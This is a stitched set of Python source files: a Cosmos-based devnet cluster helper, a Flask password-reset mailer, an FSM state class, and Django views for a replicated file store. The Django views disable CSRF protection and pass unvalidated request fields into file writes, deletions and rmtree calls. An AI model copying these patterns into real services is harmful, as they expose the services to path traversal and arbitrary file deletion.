return output.strip().decode()
@format_doc_string(
options=",".join(v.value for v in ModuleAccount.__members__.values())
)
def module_address(self, name):
"""
get address of module accounts
:param name: name of module account, values: {options}
"""
data = hashlib.sha256(ModuleAccount(name).value.encode()).digest()[:20]
return bech32.bech32_encode("cro", bech32.convertbits(data, 8, 5))
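    # Worked example of the derivation above: the module account address is the
    # first 20 bytes of sha256(module name), bech32-encoded with the "cro" prefix.
    #
    #     data = hashlib.sha256(b"gov").digest()[:20]
    #     bech32.bech32_encode("cro", bech32.convertbits(data, 8, 5))
    #
    # The result depends only on the module name and the prefix, so it is the
    # same on every chain using the "cro" prefix.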
def account(self, addr, i=0):
return json.loads(
self.raw(
"query", "auth", "account", addr, output="json", node=self.node_rpc(i)
)
)
def supply(self, supply_type):
return json.loads(
self.raw(
"query", "supply", supply_type, output="json", node=self.node_rpc(0)
)
)
def validator(self, addr, i=0):
return json.loads(
self.raw(
"query",
"staking",
"validator",
addr,
output="json",
node=self.node_rpc(i),
)
)
def validators(self, i=0):
return json.loads(
self.raw(
"query", "staking", "validators", output="json", node=self.node_rpc(i)
)
)["validators"]
def staking_pool(self, bonded=True):
return int(
json.loads(
self.raw(
"query", "staking", "pool", output="json", node=self.node_rpc(0)
)
)["bonded_tokens" if bonded else "not_bonded_tokens"]
)
def transfer(self, from_, to, coins, i=0, generate_only=False, fees=None):
return json.loads(
self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else None,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
fees=fees,
)
)
def transfer_from_ledger(
self, from_, to, coins, i=0, generate_only=False, fees=None
):
def send_request():
try:
self.output = self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else "",
"--ledger",
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
fees=fees,
sign_mode="amino-json",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 11):
self.leger_button.press_right()
time.sleep(0.4)
self.leger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def get_delegated_amount(self, which_addr, i=0):
return json.loads(
self.raw(
"query",
"staking",
"delegations",
which_addr,
home=self.home(i),
chain_id=self.chain_id,
node=self.node_rpc(0),
output="json",
)
)
def delegate_amount(self, to_addr, amount, from_addr, i=0):
return json.loads(
self.raw(
"tx",
"staking",
"delegate",
to_addr,
amount,
"-y",
home=self.home(i),
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
# to_addr: croclcl1... , from_addr: cro1...
def unbond_amount(self, to_addr, amount, from_addr, i=0):
return json.loads(
self.raw(
"tx",
"staking",
"unbond",
to_addr,
amount,
"-y",
home=self.home(i),
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
    # to_validator_addr: crocncl1..., from_validator_addr: crocncl1..., from_addr: cro1...
def redelegate_amount(
self, to_validator_addr, from_validator_addr, amount, from_addr, i=0
):
return json.loads(
self.raw(
"tx",
"staking",
"redelegate",
from_validator_addr,
to_validator_addr,
amount,
"-y",
home=self.home(i),
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def make_multisig(self, name, signer1, signer2, i=0):
self.raw(
"keys",
"add",
name,
multisig=f"{signer1},{signer2}",
multisig_threshold="2",
home=self.home(i),
keyring_backend="test",
output="json",
)
def sign_multisig_tx(self, tx_file, multi_addr, signer_name, i=0):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
multisig=multi_addr,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def encode_signed_tx(self, signed_tx):
return self.raw(
"tx",
"encode",
signed_tx,
)
def sign_single_tx(self, tx_file, signer_name, i=0):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def combine_multisig_tx(self, tx_file, multi_name, signer1_file, signer2_file, i=0):
return json.loads(
self.raw(
"tx",
"multisign",
tx_file,
multi_name,
signer1_file,
signer2_file,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def broadcast_tx(self, tx_file, i=0):
return json.loads(self.raw("tx", "broadcast", tx_file, node=self.node_rpc(i)))
def unjail(self, addr, i=0):
return json.loads(
self.raw(
"tx",
"slashing",
"unjail",
"-y",
from_=addr,
home=self.home(i),
node=self.node_rpc(i),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def create_validator(
self,
amount,
i,
moniker=None,
commission_max_change_rate="0.01",
commission_rate="0.1",
commission_max_rate="0.2",
min_self_delegation="1",
identity="",
website="",
security_contact="",
details="",
):
"""MsgCreateValidator
        create the node with create_node before calling this"""
pubkey = (
self.raw("tendermint", "show-validator", home=self.home(i)).strip().decode()
)
return json.loads(
self.raw(
"tx",
"staking",
"create-validator",
"-y",
from_=self.address("validator", i),
amount=amount,
pubkey=pubkey,
min_self_delegation=min_self_delegation,
                # commission
commission_rate=commission_rate,
commission_max_rate=commission_max_rate,
commission_max_change_rate=commission_max_change_rate,
# description
moniker=moniker or self.config["validators"][i]["moniker"],
identity=identity,
website=website,
security_contact=security_contact,
details=details,
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def edit_validator(
self,
i,
commission_rate=None,
moniker=None,
identity=None,
website=None,
security_contact=None,
details=None,
):
"""MsgEditValidator"""
options = dict(
commission_rate=commission_rate,
# description
moniker=moniker,
identity=identity,
website=website,
security_contact=security_contact,
details=details,
)
return json.loads(
self.raw(
"tx",
"staking",
"edit-validator",
"-y",
from_=self.address("validator", i),
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
**{k: v for k, v in options.items() if v is not None},
)
)
def gov_propose(self, proposor, kind, proposal, i=0):
if kind == "software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
proposal["name"],
"-y",
from_=proposor,
# content
title=proposal.get("title"),
description=proposal.get("description"),
upgrade_height=proposal.get("upgrade-height"),
upgrade_time=proposal.get("upgrade-time"),
upgrade_info=proposal.get("upgrade-info"),
deposit=proposal.get("deposit"),
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
elif kind == "cancel-software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
"-y",
from_=proposor,
# content
title=proposal.get("title"),
description=proposal.get("description"),
deposit=proposal.get("deposit"),
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
else:
with tempfile.NamedTemporaryFile("w") as fp:
json.dump(proposal, fp)
fp.flush()
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
fp.name,
"-y",
from_=proposor,
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_vote(self, voter, proposal_id, option, i=0):
return json.loads(
self.raw(
"tx",
"gov",
"vote",
proposal_id,
option,
"-y",
from_=voter,
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_deposit(self, depositor, proposal_id, amount, i=0):
return json.loads(
self.raw(
"tx",
"gov",
"deposit",
proposal_id,
amount,
"-y",
from_=depositor,
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def query_proposals(self, depositor=None, limit=None, status=None, voter=None):
return json.loads(
self.raw(
"query",
"gov",
"proposals",
depositor=depositor,
count_total=limit,
status=status,
voter=voter,
output="json",
node=self.node_rpc(0),
)
)
def query_proposal(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"proposal",
proposal_id,
output="json",
node=self.node_rpc(0),
)
)
def query_tally(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"tally",
proposal_id,
output="json",
node=self.node_rpc(0),
)
)
def ibc_transfer(
self,
from_,
to,
amount,
channel, # src channel
target_version, # chain version number of target chain
i=0,
):
return json.loads(
self.raw(
"tx",
"ibc-transfer",
"transfer",
"transfer", # src port
channel,
to,
amount,
"-y",
# FIXME https://github.com/cosmos/cosmos-sdk/issues/8059
"--absolute-timeouts",
from_=from_,
home=self.home(i),
node=self.node_rpc(i),
keyring_backend="test",
chain_id=self.chain_id,
packet_timeout_height=f"{target_version}-10000000000",
packet_timeout_timestamp=0,
)
)
def start_cluster(data_dir):
cmd = [
sys.executable,
"-msupervisor.supervisord",
"-c",
data_dir / SUPERVISOR_CONFIG_FILE,
]
return subprocess.Popen(cmd, env=dict(os.environ, PYTHONPATH=":".join(sys.path)))
class TailLogsThread(threading.Thread):
def __init__(self, base_dir, pats: List[str]):
self.base_dir = base_dir
self.tailer = multitail2.MultiTail([str(base_dir / pat) for pat in pats])
self._stop_event = threading.Event()
super().__init__()
def run(self):
while not self.stopped:
for (path, _), s in self.tailer.poll():
print(Path(path).relative_to(self.base_dir), s)
# TODO Replace this with FAM/inotify for watching filesystem events.
time.sleep(0.5)
def stop(self):
self._stop_event.set()
@property
def stopped(self):
return self._stop_event.is_set()
def start_tail_logs_thread(data_dir):
t = TailLogsThread(data_dir, ["*/node*.log", "relayer-*.log"])
t.start()
return t
def process_config(config, base_port):
"""
fill default values in config
"""
for i, val in enumerate(config["validators"]):
if "moniker" not in val:
val["moniker"] = f"node{i}"
if "base_port" not in val:
val["base_port"] = base_port + i * 10
if "hostname" not in val:
val["hostname"] = "localhost"
def init_devnet(
data_dir,
config,
base_port,
image=IMAGE,
cmd=None,
gen_compose_file=False,
):
"""
init data directory
"""
def create_account(cli, account, use_ledger=False):
if use_ledger:
acct = cli.create_account_ledger(account["name"])
else:
acct = cli.create_account(account["name"])
vesting = account.get("vesting")
if not vesting:
cli.add_genesis_account(acct["address"], account["coins"])
else:
genesis_time = isoparse(genesis["genesis_time"])
end_time = genesis_time + datetime.timedelta(
seconds=durations.Duration(vesting).to_seconds()
)
vend = int(end_time.timestamp())
cli.add_genesis_account(
acct["address"],
account["coins"],
vesting_amount=account["coins"],
vesting_end_time=vend,
)
return acct
process_config(config, base_port)
(data_dir / "config.json").write_text(json.dumps(config))
cmd = cmd or CHAIN
# init home directories
for i, val in enumerate(config["validators"]):
ChainCommand(cmd)(
"init",
val["moniker"],
chain_id=config["chain_id"],
home=home_dir(data_dir, i),
)
if "consensus_key" in val:
# restore consensus private key
with (home_dir(data_dir, i) / "config/priv_validator_key.json").open(
"w"
) as fp:
json.dump(
{
"address": hashlib.sha256(
base64.b64decode(val["consensus_key"]["pub"])
)
.hexdigest()[:40]
.upper(),
"pub_key": {
"type": "tendermint/PubKeyEd25519",
"value": val["consensus_key"]["pub"],
},
"priv_key": {
"type": "tendermint/PrivKeyEd25519",
"value": val["consensus_key"]["priv"],
},
},
fp,
)
if "genesis_file" in config:
genesis_bytes = open(
config["genesis_file"] % {"here": Path(config["path"]).parent}, "rb"
).read()
else:
genesis_bytes = (data_dir / "node0/config/genesis.json").read_bytes()
(data_dir / "genesis.json").write_bytes(genesis_bytes)
(data_dir / "gentx").mkdir()
for i in range(len(config["validators"])):
try:
(data_dir / f"node{i}/config/genesis.json").unlink()
except OSError:
pass
(data_dir / f"node{i}/config/genesis.json").symlink_to("../../genesis.json")
(data_dir / f"node{i}/config/gentx").symlink_to("../../gentx")
# now we can create ClusterCLI
cli = ClusterCLI(data_dir.parent, config["chain_id"], cmd)
# patch the genesis file
genesis = jsonmerge.merge(
json.load(open(data_dir / "genesis.json")),
config.get("genesis", {}),
)
(data_dir / "genesis.json").write_text(json.dumps(genesis))
cli.validate_genesis()
# create accounts
accounts = []
for i, node in enumerate(config["validators"]):
mnemonic = node.get("mnemonic")
account = cli.create_account("validator", i, mnemonic=mnemonic)
accounts.append(account)
if "coins" in node:
cli.add_genesis_account(account["address"], node["coins"], i)
if "staked" in node:
cli.gentx(
"validator",
node["staked"],
i,
min_self_delegation=node.get("min_self_delegation", 1),
)
# create accounts
for account in config.get("accounts", []):
account = create_account(cli, account)
accounts.append(account)
account_hw = config.get("hw_account")
if account_hw:
account = create_account(cli, account_hw, True)
accounts.append(account)
# output accounts
(data_dir / "accounts.json").write_text(json.dumps(accounts))
# collect-gentxs if directory not empty
if next((data_dir / "gentx").iterdir(), None) is not None:
cli.collect_gentxs(data_dir / "gentx", 0)
# realise the symbolic links, so the node directories can be used independently
genesis_bytes = (data_dir / "genesis.json").read_bytes()
for i in range(len(config["validators"])):
(data_dir / f"node{i}/config/gentx").unlink()
tmp = data_dir / f"node{i}/config/genesis.json"
tmp.unlink()
tmp.write_bytes(genesis_bytes)
# write tendermint config
peers = config.get("peers") or ",".join(
[
"tcp://%s@%s:%d"
% (cli.node_id(i), val["hostname"], ports.p2p_port(val["base_port"]))
for i, val in enumerate(config["validators"])
]
)
for i, val in enumerate(config["validators"]):
edit_tm_cfg(data_dir / f"node{i}/config/config.toml", val["base_port"], peers)
edit_app_cfg(data_dir / f"node{i}/config/app.toml", val["base_port"])
# write supervisord config file
with (data_dir / SUPERVISOR_CONFIG_FILE).open("w") as fp:
write_ini(fp, supervisord_ini(cmd, config["validators"], config["chain_id"]))
if gen_compose_file:
yaml.dump(
docker_compose_yml(cmd, config["validators"], data_dir, image),
(data_dir / "docker-compose.yml").open("w"),
)
def relayer_chain_config(data_dir, chain_id):
cfg = json.load((data_dir / chain_id / "config.json").open())
rpc_port = ports.rpc_port(cfg["validators"][0]["base_port"])
return {
"key": "relayer",
"chain-id": chain_id,
# rpc address of first node
"rpc-addr": f"http://localhost:{rpc_port}",
"account-prefix": "cro",
"gas-adjustment": 1.5,
"gas-prices": "0.0basecro",
"trusting-period": "336h",
"debug": True,
}
def init_cluster(
data_dir, config_path, base_port, image=IMAGE, cmd=None, gen_compose_file=False
):
config = yaml.safe_load(open(config_path))
# override relayer config in config.yaml
rly_section = config.pop("relayer", {})
for chain_id, cfg in config.items():
cfg["path"] = str(config_path)
cfg["chain_id"] = chain_id
chains = list(config.values())
for chain in chains:
(data_dir / chain["chain_id"]).mkdir()
init_devnet(
data_dir / chain["chain_id"], chain, base_port, image, cmd, gen_compose_file
)
with (data_dir / SUPERVISOR_CONFIG_FILE).open("w") as fp:
write_ini(
fp,
supervisord_ini_group(
config.keys(), list(rly_section.get("paths", {}).keys())
),
)
if len(chains) > 1:
# write relayer config
rly_home = data_dir / "relayer"
rly_home.mkdir()
rly_cfg = rly_home / "config/config.yaml"
rly_cfg.parent.mkdir()
rly_section["chains"] = [
relayer_chain_config(data_dir, chain_id) for chain_id in config
]
with rly_cfg.open("w") as fp:
yaml.dump(rly_section, fp)
# restore the relayer account in relayer
for chain in chains:
mnemonic = find_account(data_dir, chain["chain_id"], "relayer")["mnemonic"]
subprocess.run(
[
"relayer",
"--home",
rly_home,
"keys",
"restore",
chain["chain_id"],
"relayer",
mnemonic,
"--coin-type",
"394", # mainnet cro
],
check=True,
)
def find_account(data_dir, chain_id, name):
accounts = json.load((data_dir / chain_id / "accounts.json").open())
return next(acct for acct in accounts if acct["name"] == name)
def supervisord_ini(cmd, validators, chain_id):
ini = {}
for i, node in enumerate(validators):
ini[f"program:{chain_id}-node{i}"] = dict(
COMMON_PROG_OPTIONS,
command=f"{cmd} start --home %(here)s/node{i}",
stdout_logfile=f"%(here)s/node{i}.log",
)
return ini
def supervisord_ini_group(chain_ids, paths):
cfg = {
"include": {
"files": " ".join(
f"%(here)s/{chain_id}/tasks.ini" for chain_id in chain_ids
)
},
"supervisord": {
"pidfile": "%(here)s/supervisord.pid",
"nodaemon": "true",
"logfile": "/dev/null",
"logfile_maxbytes": "0",
},
"rpcinterface:supervisor": {
"supervisor.rpcinterface_factory": "supervisor.rpcinterface:"
"make_main_rpcinterface",
},
"unix_http_server": {"file": "%(here)s/supervisor.sock"},
"supervisorctl": {"serverurl": "unix://%(here)s/supervisor.sock"},
}
for path in paths:
cfg[f"program:relayer-{path}"] = dict(
COMMON_PROG_OPTIONS,
command=f"relayer --home %(here)s/relayer tx link-then-start {path}",
stdout_logfile=f"%(here)s/relayer-{path}.log",
)
return cfg
def docker_compose_yml(cmd, validators, data_dir, image):
return {
"version": "3",
"services": {
f"node{i}": {
"image": image,
"command": "chaind start",
"volumes": [f"{data_dir.absolute() / f'node{i}'}:/.chain-maind:Z"],
}
for i, val in enumerate(validators)
},
}
def edit_tm_cfg(path, base_port, peers, *, custom_edit=None):
doc = tomlkit.parse(open(path).read())
# tendermint is started in-process, so proxy_app is not needed
# doc['proxy_app'] = 'tcp://127.0.0.1:%d' % abci_port(base_port)
doc["rpc"]["laddr"] = "tcp://0.0.0.0:%d" % ports.rpc_port(base_port)
doc["rpc"]["pprof_laddr"] = "localhost:%d" % ports.pprof_port(base_port)
doc["rpc"]["grpc_laddr"] = "tcp://0.0.0.0:%d" % ports.grpc_port_tx_only(base_port)
doc["p2p"]["laddr"] = "tcp://0.0.0.0:%d" % ports.p2p_port(base_port)
doc["p2p"]["persistent_peers"] = peers
doc["p2p"]["addr_book_strict"] = False
doc["p2p"]["allow_duplicate_ip"] = True
doc["consensus"]["timeout_commit"] = "1s"
doc["rpc"]["timeout_broadcast_tx_commit"] = "30s"
if custom_edit is not None:
custom_edit(doc)
open(path, "w").write(tomlkit.dumps(doc))
def edit_app_cfg(path, base_port):
doc = tomlkit.parse(open(path).read())
# enable api server
doc["api"]["enable"] = True
doc["api"]["swagger"] = True
doc["api"]["enabled-unsafe-cors"] = True
doc["api"]["address"] = "tcp://0.0.0.0:%d" % ports.api_port(base_port)
doc["grpc"]["address"] = "0.0.0.0:%d" % ports.grpc_port(base_port)
# take snapshot for statesync
doc["pruning"] = "nothing"
doc["state-sync"]["snapshot-interval"] = 5
doc["state-sync"]["snapshot-keep-recent"] = 10
open(path, "w").write(tomlkit.dumps(doc))
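# The custom_edit hook of edit_tm_cfg lets callers tweak extra tendermint
# settings before the file is written back. A minimal sketch (the tx_index
# setting is only an example, not something this module requires):
#
#   def enable_kv_indexer(doc):
#       doc["tx_index"]["indexer"] = "kv"
#
#   edit_tm_cfg(path, base_port, peers, custom_edit=enable_kv_indexer)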
if __name__ == "__main__":
interact("rm -r data; mkdir data", ignore_error=True)
data_dir = Path("data")
init_cluster(data_dir, "config.yaml", 26650)
supervisord = start_cluster(data_dir)
t = start_tail_logs_thread(data_dir)
supervisord.wait()
t.stop()
t.join()
|
email.py
|
from flask_mail import Message
from app import mail, app
from flask import render_template
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_mail('[Бложик] Сброс пароля', sender=app.config['ADMINS'][0], recipients=[user.email],
text_body=render_template('email/reset_password.txt', user=user, token=token),
html_body=render_template('email/reset_password.html', user=user, token=token))
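# Note: send_async_email pushes an application context explicitly because
# Flask-Mail reads its configuration from the app context, which is not
# available automatically inside a worker thread. Callers only ever need
# send_mail(); a hedged usage sketch (subject and body values are made up):
#
#   send_mail('Hello', app.config['ADMINS'][0], [user.email],
#             text_body='plain text body', html_body='<p>html body</p>')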
|
__State.py
|
from multiprocessing import Process
from .base import Base
'''
The base State class.
Code running in a State may be stopped at any time.
'''
class State(Base):
'''
name: the name of the State used in logging
fsm: the FSM object the State is associated with
'''
def __init__(self, name, fsm, add_to_fsm=True):
super(State, self).__init__("State", name)
if fsm is None:
self.logfatal("fsm is not set")
self.__fsm = fsm
self.__transitions = set()
if add_to_fsm:
fsm._FSM__add_state(self)
# Defines the link between a Transition and the State. The State may have many Transitions.
def add_transition(self, transition):
if transition._Transition__fsm != self.__fsm:
self.logfatal("transition is for a different fsm")
for t in self.__transitions:
if t._Transition__watcher == transition._Transition__watcher:
self.logfatal("watcher already used in this state")
self.__transitions.add(transition)
### Overridable methods ###
'''
Code to be run when the State is started.
Use this function for initialisation.
'''
def start(self):
self.logdebug("started")
'''
Code to be run when the State is stopped.
'''
def stop(self):
self.logdebug("stopped")
'''
Code to be run on an iteration of the FSM's main loop.
Similar to MAVProxy's 'idle_task' function in a module.
'''
def loop(self):
pass
### / Overridable methods ###
def __load_transistions(self):
for t in self.__transitions:
t._Transition__load()
def __unload_transistions(self):
for t in self.__transitions:
t._Transition__unload()
def __loop(self):
self.loop()
next_state = None
for t in self.__transitions:
res = t._Transition__loop()
if res is not None:
next_state = res
return next_state
'''
A subclass of State for applications requiring asynchronous execution.
Code running in a StateAsync may be stopped at any time.
'''
class StateAsync(State):
'''
name: the name of the State used in logging
fsm: the FSM object the State is associated with
target: the function to be called asynchronously. No arguments are passed to 'target' on execution.
'''
def __init__(self, name, fsm, target):
super(StateAsync, self).__init__(name, fsm)
if not callable(target):
self.logfatal("target is not callable")
self.__target = target
self.__process = None
### Method Overrides ###
def start(self):
self.__process = Process(target=self.__target)
self.__process.start()
self.logdebug("started")
def stop(self):
self.__process.terminate()
self.__process.join(None)
self.__process = None
self.logdebug("stopped")
### / Method Overrides ###
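# Example (illustrative; assumes an FSM instance named fsm and a Transition
# object named some_transition exist elsewhere). A concrete State only needs
# to override the hooks it cares about:
#
#   class Idle(State):
#       def start(self):
#           self.logdebug("entering idle")
#
#       def loop(self):
#           pass  # poll sensors, check exit conditions, etc.
#
#   idle = Idle("idle", fsm)
#   idle.add_transition(some_transition)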
|
views.py
|
import os
import shutil
import threading
import mimetypes
from IPython import embed
from .models import Bucket, File
from django.views.generic import TemplateView
from cloud.settings import ARCHIVE_DIR, NODE_NAME
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseBadRequest, JsonResponse, HttpResponseNotFound
from .helper import replicateBucket, hinted_handoff, replicateDelete, replicateFile, \
replicateDeleteFile, replicateUpdateFile
# Create your views here.
class ServerStatus(TemplateView):
def get(self, request):
return HttpResponse('OK')
@method_decorator(csrf_exempt, name='dispatch')
class CreateBucket(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
count = 0
if len(buckets) == 0:
os.makedirs(path)
bucket = Bucket(name=name)
bucket.save()
result = "Bucket Creation Successful"
count += 1
else:
bucket = Bucket.objects.get(name=name)
result = "Bucket already exists"
count += replicateBucket(name)
data = {'result': result, 'count': count}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class DeleteBucket(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
count = 0
if len(buckets) == 0:
result = "Bucket doesn't exist"
else:
shutil.rmtree(path)
bucket = Bucket.objects.get(name=name)
bucket.delete()
result = 'Bucket Deleted Successfully'
count += 1
count += replicateDelete(name)
data = {'result': result, 'count': count}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateBucket(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
if len(buckets) == 0:
os.makedirs(path)
bucket = Bucket(name=name)
bucket.save()
result = "Bucket Creation Successful"
return HttpResponse(result)
return HttpResponseBadRequest('Bucket already exists')
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateDelete(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
if len(buckets) > 0:
shutil.rmtree(path)
bucket = Bucket.objects.get(name=name)
bucket.delete()
result = "Bucket delete successful"
return HttpResponse(result)
return HttpResponseBadRequest("Bucket doesn't exist")
@method_decorator(csrf_exempt, name='dispatch')
class HandleAlive(TemplateView):
def post(self, request):
node = request.POST.get('node')
stopper = threading.Event()
x = threading.Thread(target=hinted_handoff, args=(node, stopper), daemon=True)
x.start()
return HttpResponse('OK')
@method_decorator(csrf_exempt, name='dispatch')
class CreateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST['name']
bucket = request.POST['bucket']
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
count = 0
result = ''
clocks = {}
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
result = 'No such bucket exists'
elif len(files) > 0:
result = 'File already exists. Please use "/update/filename" API to update it.'
else:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File(version=1, name=name, bucket=bucket_model)
file_model.save()
clocks = {NODE_NAME: file_model.version}
result = 'File Creation Successful'
count += 1
rep_count, rep_clocks = replicateFile(name, bucket, file)
print(rep_count, rep_clocks)
count += rep_count
clocks = {**clocks, **rep_clocks}
data = {'result': result, 'count': count, 'vector_clocks': clocks}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST.get('name')
bucket = request.POST.get('bucket')
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
return HttpResponseBadRequest('No such bucket exists')
elif len(files) > 0:
return HttpResponseBadRequest('File already exists. Please use "/update/filename" API to update it.')
else:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File(version=1, name=name, bucket=bucket_model)
file_model.save()
result = {'vector': file_model.version, 'status': 'File Creation Successful'}
return JsonResponse(result)
@method_decorator(csrf_exempt, name='dispatch')
class DeleteFile(TemplateView):
def post(self, request):
name = request.POST['name']
bucket = request.POST['bucket']
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
count = 0
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
result = 'No such bucket exists'
elif len(files) == 0:
result = 'File doesn\'t exist.'
else:
os.remove(path)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
file_model.delete()
result = 'File Deletion Successful'
count += 1
count += replicateDeleteFile(name, bucket)
data = {'result': result, 'count': count, 'vector_clocks': {}}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateDeleteFile(TemplateView):
def post(self, request):
name = request.POST.get('name')
bucket = request.POST.get('bucket')
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
return HttpResponseBadRequest('No such bucket exists')
elif len(files) == 0:
return HttpResponseBadRequest('File doesn\'t exist.')
else:
os.remove(path)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
file_model.delete()
result = 'File Deletion Successful'
return HttpResponse(result)
@method_decorator(csrf_exempt, name='dispatch')
class UpdateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST['name']
bucket = request.POST['bucket']
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
count = 0
result = ''
clocks = {}
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
result = 'No such bucket exists'
elif len(files) == 0:
result = 'File doesn\'t exist.'
else:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
file_model.version += 1
file_model.save()
clocks = {NODE_NAME: file_model.version}
result = 'File Updation Successful'
count += 1
rep_count, rep_clocks = replicateUpdateFile(name, bucket, file)
print(rep_count, rep_clocks)
count += rep_count
clocks = {**clocks, **rep_clocks}
data = {'result': result, 'count': count, 'vector_clocks': clocks}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateUpdateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST.get('name')
bucket = request.POST.get('bucket')
vector = int(request.POST.get('vector'))
timestamp = float(request.POST.get('timestamp'))
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
return HttpResponseBadRequest('No such bucket exists')
elif len(files) == 0:
return HttpResponseBadRequest('File doesn\'t exist.')
else:
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
if vector > file_model.version:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version += 1
file_model.save()
result = 'File Updation Successful'
elif vector == file_model.version and timestamp > file_model.last_modified.timestamp():
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version += 1
file_model.save()
result = 'File Updation Successful'
else:
result = 'File version is higher than the received file'
result = {'vector': file_model.version, 'status': result}
return JsonResponse(result)
@method_decorator(csrf_exempt, name='dispatch')
class FileDownload(TemplateView):
def get(self, request, bucket, name):
try:
bucket_model = Bucket.objects.get(name=bucket)
file = File.objects.get(name=name, bucket=bucket_model)
if file:
print('File exists')
except ObjectDoesNotExist:
return HttpResponseNotFound('Invalid File')
filepath = os.path.join(ARCHIVE_DIR, bucket, name)
